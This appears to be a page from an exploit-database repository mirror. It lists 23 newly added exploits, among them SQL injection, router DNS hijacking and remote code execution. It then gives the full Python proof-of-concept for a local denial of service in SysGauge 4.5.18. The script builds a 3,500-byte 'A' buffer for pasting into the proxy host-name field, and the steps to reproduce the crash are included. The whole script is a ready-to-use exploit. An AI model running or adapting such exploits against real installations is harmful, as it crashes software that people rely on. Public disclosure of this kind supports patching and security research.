
23 changes to exploits/shellcodes SysGauge 4.5.18 - Local Denial of Service Systematic SitAware - NVG Denial of Service Allok AVI DivX MPEG to DVD Converter 2.6.1217 - Buffer Overflow (SEH) Allok Video Joiner 4.6.1217 - Stack-Based Buffer Overflow Allok WMV to AVI MPEG DVD WMV Converter 4.6.1217 - Buffer Overflow Faleemi Windows Desktop Software - (DDNS/IP) Local Buffer Overflow Advantech WebAccess < 8.1 - webvrpcs DrawSrv.dll Path BwBuildPath Stack-Based Buffer Overflow osTicket 1.10 - SQL Injection osTicket 1.10 - SQL Injection (PoC) Open-AuditIT Professional 2.1 - Cross-Site Request Forgery Homematic CCU2 2.29.23 - Arbitrary File Write MiniCMS 1.10 - Cross-Site Request Forgery WordPress Plugin Relevanssi 4.0.4 - Reflected Cross-Site Scripting WordPress Plugin Contact Form 7 to Database Extension 2.10.32 - CSV Injection Homematic CCU2 2.29.23 - Remote Command Execution Joomla! Component Acymailing Starter 5.9.5 - CSV Macro Injection Joomla! Component AcySMS 3.5.0 - CSV Macro Injection WordPress Plugin WP Security Audit Log 3.1.1 - Sensitive Information Disclosure Tenda W308R v2 Wireless Router 5.07.48 - Cookie Session Weakness Remote DNS Change osCommerce 2.3.4.1 - Remote Code Execution Tenda W316R Wireless Router 5.07.50 - Remote DNS Change D-Link DIR-850L Wireless AC1200 Dual Band Gigabit Cloud Router - Authentication Bypass Tenda FH303/A300 Firmware V5.07.68_EN - Remote DNS Change Vtiger CRM 6.3.0 - Authenticated Arbitrary File Upload (Metasploit) Tenda W3002R/A302/w309r Wireless Router V5.07.64_en - Remote DNS Change (PoC)
24 lines
No EOL
1.4 KiB
Python
Executable file
24 lines
No EOL
1.4 KiB
Python
Executable file
#!/usr/bin/python
|
|
############################################################################################
|
|
# Exploit Title : SysGauge v4.5.18 - Local Denial of Service #
|
|
# Exploit Author : Hashim Jawad #
|
|
# Twitter : @ihack4falafel #
|
|
# Author Website : ihack4falafel[.]com #
|
|
# Vendor Homepage : http://www.sysgauge.com/ #
|
|
# Vulnerable Software : http://www.sysgauge.com/setups/sysgauge_setup_v4.5.18.exe #
|
|
# Note : SysGauge Pro and Ultimate v4.5.18 are also vulnerable #
|
|
# Steps to Reproduce : ~ Copy content of payload.txt #
|
|
# ~ Select Manual proxy configuration under Options->Proxy #
|
|
# ~ Paste content in 'Proxy Server Host Name' field and click Save #
|
|
############################################################################################
|
|
|
|
buffer = "A" * 3500
|
|
|
|
try:
|
|
f=open("payload.txt","w")
|
|
print "[+] Creating %s bytes evil payload.." %len(buffer)
|
|
f.write(buffer)
|
|
f.close()
|
|
print "[+] File created!"
|
|
except:
|
|
print "File cannot be created" |